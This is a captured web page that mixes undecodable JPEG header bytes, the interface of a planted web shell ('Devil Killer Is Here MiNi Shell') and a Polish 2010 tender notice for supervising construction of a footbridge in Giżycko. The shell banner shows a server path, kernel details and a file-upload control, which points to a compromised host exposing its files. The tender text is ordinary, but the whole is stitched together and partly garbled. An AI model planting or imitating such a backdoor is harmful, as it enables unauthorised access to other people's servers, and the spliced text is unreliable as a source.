JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/98448-N-2010.html

<p class="kh_header"><b>Giżycko: Nadzór inwestorski nad realizacją zadania - Budowa kładki nad ul. Kolejową nad torami - łączącej jezioro Niegocin z centrum miasta Giżycka.</b><br>
<b>Numer ogłoszenia: 98448 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Giżycko , al. 1 Maja 14/120, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4282997, 4285231 w. 43, faks 087 4285241.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gizycko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad realizacją zadania - Budowa kładki nad ul. Kolejową nad torami - łączącej jezioro Niegocin z centrum miasta Giżycka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem zamówienia jest: Nadzór inwestorski nad realizacją zadania pn.  
     Budowa kładki nad ul. Kolejową nad torami - łączącej jezioro Niegocin z centrum miasta Giżycka

2.2 Budowa kładki nad ul. Kolejową nad torami - łączącej jezioro Niegocin z centrum miasta Giżycka obejmuje realizacje obiektów:

2.2.1 KŁADKA DLA PIESZYCH ZE SCHODAMI ŻELBETOWYMI  
Kładka dla pieszych o konstrukcji stalowej z pomostem żelbetowym, podwieszona na jednym pylonie, będącym główną podporą o konstrukcji stalowej z profili rurowych.
Elementy wyposażenia kładki:

- nawierzchnia epoksydowo-poliuretanowa szorstka - 1287,90 m2,
-  balustrady o wysokości 1,30 m - 102 m,
- balustrady o wysokości 1,10 m - 418,60 m,
- ekrany ochronne poliwęglanowi - 204,00 m2,
- windy:
3 kondygnacyjna od strony Eko-Mariny - 1 kpl., 
2 kondygnacyjna od strony pasażu - 1 kpl., 
- oprawy oświetleniowe stanowiące doświetlenie powierzchni chodnika kładki - 14 kpl.,
- wpusty punktowe zlokalizowane wzdłuż kładki - 14 szt.,
- odwodnienie liniowe - 227,70 m,
- łożyska elastomerowe: 
2x 750 kN (min 150 kN) na podporze nr 2 - 2 szt.,
2x 350 kN (min 50 kN) na podporze nr 3 - 2 szt. 
Podstawowe parametry konstrukcji:
- całkowita długość kładki 71,30 m,
- rozpiętość przęseł 56,12m oraz 14,48m,
- rzędna góry pylonu 153.25 m n.p.m.,
- rzędna torowiska PKP 118.37 m n. p. m. (skrajnia PKP 7,20 m),
- szerokość chodnika na kładce - 5,0 m,
- szerokość biegu schodów - 3,0 m,
- wymiary schodów 15 x 30 cm,
Posadowienie konstrukcji zaprojektowano częściowo na palach wierconych fi = 1000 mm (22 szt.)  (pod pylonem i ramą kotwiącą) i 600 mm (4 szt.) (pod filarem od strony pasażu).
 2.2.2 ODPROWADZENIE WÓD OPADOWYCH
   Odprowadzenie wód opadowych  do istniejącej kanalizacji deszczowej w obrębie działki przeznaczonej na budowę mostu z rur PCV fi 160 i fi 200 klasy SN 8 łączonych na uszczelki gumowe:
 - Rurociągi kanalizacji deszczowej fi 160 mm - 81,00 m,                                 
 - Rurociągi kanalizacji deszczowej fi 200 mm - 8,0 m,                                   
 - Odwodnienie liniowe z rusztem żeliwnym - 56,00 m.
2.2.3 LINIE KABLOWE
- Linia kablowa n.n. oświetlenia zewnętrznego 0,4 kV YKYżo 5 x 10 mm2 - 50 m,
- Linia kablowa n.n. iluminacji kładki  0,4 kV              YKYżo 5 x 4 mm2 - 260 m,
                                                                       YKYżo 3 x 2,5 mm2 - 168 m,
                                                                       YKYżo 4 x 25 mm2 - 50,0 m,
- Linia kablowa n.n. zasilania reklamy, fontann i dźwigów 0,4 kV 4 x 35 mm - 200 m,

2.2.4  NAWIERZCHNIE
Rozebranie i ponowne ułożenie kostki brukowej betonowej z posypką granitowa gr 8 cm -  1653,50 m2.
Ułożenie kostki brukowej betonowej z posypką granitową gr. 8  cm w kolorze jasnoszarym - 948,00  m2.
2.3 Zadania Inżyniera Projektu w czasie realizacji inwestycji:
1) wyznaczenie osoby koordynującej prace poszczególnych branżowych inspektorów nadzoru inwestorskiego; 
2) podejmowanie decyzji i odpowiedzialności za nie, we wszystkich sprawach związanych z jakością robót, oceną jakości materiałów i postępem robót, a ponadto w sprawach związanych z interpretacją dokumentacji projektowej, specyfikacji technicznych oraz sprawach dotyczących akceptacji wypełniania warunków Umowy przez Wykonawcę;
3) wydawanie poleceń, decyzji,  opinii,  zgody,  akceptacje i wnioski na piśmie;
4) organizowanie prac związanych z nadzorem tak, aby z tego tytułu nie było zbędnych przerw  w realizacji robót;
5) dopuszczanie  do  stosowania  lub odrzucanie  materiałów, prefabrykatów, i wszystkich elementów i urządzeń przewidzianych do  realizacji robót i przedstawia do akceptacji  Zamawiającemu. Decyzje te  muszą być oparte na wymaganiach sformułowanych w dokumentacji projektowej i specyfikacji technicznej oraz normach i przepisach związanych z realizacją zadania;
6) podjęcie i odpowiedzialność za wszelkie decyzje, które dotyczą:
a) wprowadzania zmian w dokumentacji projektowej w zakresie określonym w warunkach Umowy,
b) wyrażania zgody na wykonywanie robót w nocy i dni wolne od pracy,
c) żądania usunięcia z placu budowy osób niekompetentnych lub innych osób zatrudnionych przez Wykonawcę,
d) udzielenia Wykonawcy informacji, wyjaśnień i wskazówek dotyczących Umowy,
e) wnioskowania do Zamawiającego:
- w sprawie wprowadzenia niezbędnych zmian w dokumentacji technicznej i uzyskania zgody projektanta na zmiany,
- w sprawie przeprowadzenia niezbędnych ekspertyz i badań technicznych,
- w ważnych sprawach finansowych i prawnych;
7) uzyskiwanie od projektanta wyjaśnień wątpliwości dotyczących projektu i zawartych w nim rozwiązań;
8) opiniowanie i przedstawianie do akceptacji  Zamawiającego  dokumentacji projektowej  na proponowane przez Wykonawcę roboty dodatkowe;
9) zajmowanie stanowiska co do propozycji Wykonawcy o potrzebie wzmocnienia lub zabezpieczenia dróg i dojazdów prowadzących na plac budowy;
10) zajmowanie stanowiska co do sposobu zabezpieczenia wszelkich wykopalisk odkrytych przez Wykonawcę na placu budowy;
11) analizowanie  i  opiniowanie  przedstawionych   przez  Wykonawcę   harmonogramów i uaktualnionych harmonogramów w celu ich akceptacji przez Zamawiającego;
12) wstrzymanie robót w wypadku prowadzenia ich niezgodnie z umową i przepisami BHP;
13) kontrolowanie przestrzegania przez wykonawcę robót budowlanych   zasad BHP;
14) organizowanie  narad  koordynacyjnych  (Rada  Budowy),  sporządzanie protokółów z  narad i przekazywanie ich zainteresowanym stronom (Wykonawcy i Zamawiającemu) w terminie  3 dni po naradzie oraz prowadzenie dokumentacji ze wszystkich kontaktów z Wykonawcą;
15) sprawdzanie pomiarów i badań materiałów w miejscach wyprodukowania i na placu budowy oraz żądania wykonania badań dodatkowych, a przede wszystkim:
a) akceptacja materiałów zgodnych z wymaganiami ST ze wskazanych przez Wykonawcę źródeł,
b) podejmowanie decyzji o dopuszczeniu do użycia materiałów posiadających atest producenta,
c) akceptowanie receptur i technologii zgodnie z wymaganiami ST,
d) kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót,
e) zlecanie, za zgodą Zamawiającego,  przeprowadzenia dodatkowych badań materiałów budzących wątpliwości co do jakości,
16) akceptowanie sprzętu oraz środków transportowych  użytych do robót, co do zgodności ich z warunkami Umowy;
17)  inspekcja laboratorium Wykonawcy w celu sprawdzenia, czy stosowne urządzenia pomiarowe i sprzęt laboratoryjny Wykonawcy posiadają ważną legalizację, zostały prawidłowo wykalibrowane i odpowiadają wymaganiom norm określających procedury badań;
18) wykonanie pomiarów i badań laboratoryjnych do opracowania elaboratów końcowych, ewentualnie zlecenia tych czynności niezależnemu laboratorium akceptowanemu przez Zamawiającego i dokonanie oceny wyników badań i pomiarów;
19) ustalanie metod obmiaru robót oraz uczestniczenie przy dokonywaniu obmiarów robót przez Wykonawcę;
20) akceptowanie urządzeń i sprzętu pomiarowego stosowanego w czasie prowadzenia robót i ich obmiaru;
21) sprawdzanie wykonanych  robót i  powiadamiania wykonawcy robót o wykrytych wadach oraz poświadczenie usunięcia wad, a także ustalania rodzaju i zakresu koniecznych do wykonania robót poprawkowych;
22) wnioskowanie o dokonanie zmian (wydłużenia) terminu wykonania robót w wyszczególnionych w Umowie przypadkach i przedstawienia ich do akceptacji Zamawiającemu w ciągu 5 dni od daty zgłoszenia propozycji przez Wykonawcę;
23) ocena przedstawionych przez Wykonawcę wycen kosztów zmian w robotach i przedstawieniu do akceptacji Zamawiającemu w ciągu 3 dni od daty ich zgłoszenia;
24) ocena  przedstawionych  przez  Wykonawcę  kosztów,  które  zgodnie z warunkami  Umowy podlegają dodatkowej opłacie,  bądź własnej   wyceny   tych    kosztów  i  przedłożenia ich do akceptacji Zamawiającemu;
25) dokonanie  odbioru   technicznego:   gotowych   elementów,   robót  zanikających, ulegających zakryciu, odbioru częściowego robót oraz prac z zakresu obsługi geodezyjnej;
26) sprawdzenie miesięcznych zestawień Wykonawcy, wartości zakończonych i odebranych robót i potwierdzenie kwot do wypłaty (w ciągu 7 dni od złożenia zestawienia przez Wykonawcę);
27) poświadczenie terminu zakończenia robót;
28) stwierdzenie zakończenia  robót, sprawdzania kompletności i prawidłowości dokumentacji powykonawczej i przedłożenia do akceptacji Zamawiającego w celu ustalania terminu ostatecznego odbioru robót oraz uczestniczenie w odbiorze;
29) sprawdzanie  ostatecznej   kwoty  należnej  wykonawcy robót, ustalanie i wnioskowanie  zakresu koniecznych korekt wyliczeń wykonawcy robót i przedstawiania Zamawiającemu do podjęcia decyzji o ostatecznej wysokości tej kwoty (w ciągu 7 dni od otrzymania rozliczenia wykonawcy robót);
30) dopilnowanie zabezpieczenia przez wykonawcę robót terenu budowy w przypadku wypowiedzenia Umowy;
31) rozliczenie Umowy w przypadku wypowiedzenia jej;
32) prowadzenie całości spraw dotyczących budowy z władzami terenowymi i ludnością miejscową;
33) składanie do Zamawiającego pisemnych miesięcznych raportów (sprawozdań) z działalności obejmującej prowadzenie nadzoru robót oraz z realizacji inwestycji wraz z dokumentacją zdjęciową we współpracy z wykonawcą robót, będące nieodłącznym załącznikiem do faktur wystawianych przez Wykonawcę;
34) przygotowanie i załatwienie wszelkich spraw formalno - prawnych związane z prowadzeniem i zakończeniem robót w tym:
a) przekazanie wykonawcy robót wszelkich niezbędnych dokumentów powstałych w trakcie realizacji zadania (dokumentacja techniczna zamienna, wyniki badań, protokoły odbioru i itp.)
b) kompletowanie dokumentów niezbędnych dla właściwych organów Nadzoru  Budowlanego i Administracji Budowlanej,
c) zgłoszenie zakończenia robót  (w  tym   uzyskanie   pozwolenia   na   użytkowanie,  jeśli  jest wymagane),
d) dokonanie rozliczenia finansowego budowy  na  dzień odbioru końcowego,    
e) rozwiązywanie wszelkich innych problemów pojawiających się w czasie realizacji inwestycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2500,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żądanych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żądanych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żądanych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienie mogą ubiegać się Inżynierowie Projektu, którzy:
- zapewnią, aby czynności objęte Zamówieniem były wykonywane przez osoby legitymujące się posiadaniem właściwych uprawnień budowlanych  w specjalnościach: 
a) mostowej, 
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
c)  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d)  kolejowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 50 000,00 PLN;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inżynier Projektu, w myśl art. 26 ust. 2 b ustawy, może polegać na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w  takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W  przypadku, gdy podmiot(y) przedstawiający(e) pisemne zobowiązanie, o którym mowa wyżej, będzie uczestniczył w części wykonania zamówienia, Zamawiający żąda przedłożenia przez ten podmiot(y) dokumentów i oświadczeń wskazanych w punkcie 4.5 ppkt 1-2 Specyfikacji Istotnych Warunków Zamówienia.


Na ofertę składają się następujące dokumenty:
1.  Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty ( np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie o ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy, pełnomocnictwa). Przez aktualny rozumiemy dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.  Formularz cenowy oferty przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 do SIWZ, z podaniem ceny ryczałtowej - powiększonej o należny podatek VAT.
3. Zaświadczenia, oświadczenia i dokumenty potwierdzające, że Wykonawca spełnia warunki szczegółowe udziału w postępowaniu, przygotowane zgodnie z punktem 4 SIWZ.
4. Załączniki w postaci dokumentów opisanych w punkcie 4  i w punkcie 19 SIWZ (załączniki od nr 1 do nr 6 ).
5. Dokument potwierdzający wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>DOPUSZCZALNE ZMIANY POSTANOWIEŃ UMOWY ORAZ OKREŚLENIE       WARUNKÓW ZMIAN:
1. Zamawiający przewiduje możliwość zmiany postanowień umowy  w następujących przypadkach:
a) ustawowej zmiany podatku VAT,
b) konieczności wprowadzenia zmian  projektowych,
c) konieczności zlecenia robót  dodatkowych,
d) rozszerzenia zakresu rzeczowego robót,
e) likwidacji lub rozwiązania zespołu Inżyniera Projektu,
f) wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie   Zamawiającego,
g) wystąpieniu okoliczności, powodujących konieczność zrezygnowania przez Zamawiającego z części zakresu robót realizowanych przez Wykonawcę  w ramach inwestycji, tj. z powodu błędu w dokumentacji projektowej nie zachodzi konieczność ich wykonania. W takim przypadku wynagrodzenie Inżyniera Projektu, o którym mowa w umowie zostanie pomniejszone przez zastosowanie procentu, o jaki zmniejszyła się wartość robót z kosztorysu ofertowego wykonawcy robót w stosunku do wartości zakresu robót wykonanych przez Wykonawcę ,
h) zmiany w składzie zespołu Inżyniera Projektu,
i) zmiany osobowej podwykonawców oraz zakresu podwykonawstwa w warunkach opisanych w § 3  wzoru umowy, w przypadku gdy Inżynier Projektu wykonuje umowę przy pomocy  podwykonawców,  w zakresie zgodnym z SIWZ.
j) zatrudnienia podwykonawców w przypadku gdy Inżynier Projektu oświadczył, iż  wykona umowę  osobiście, w zakresie SIWZ,
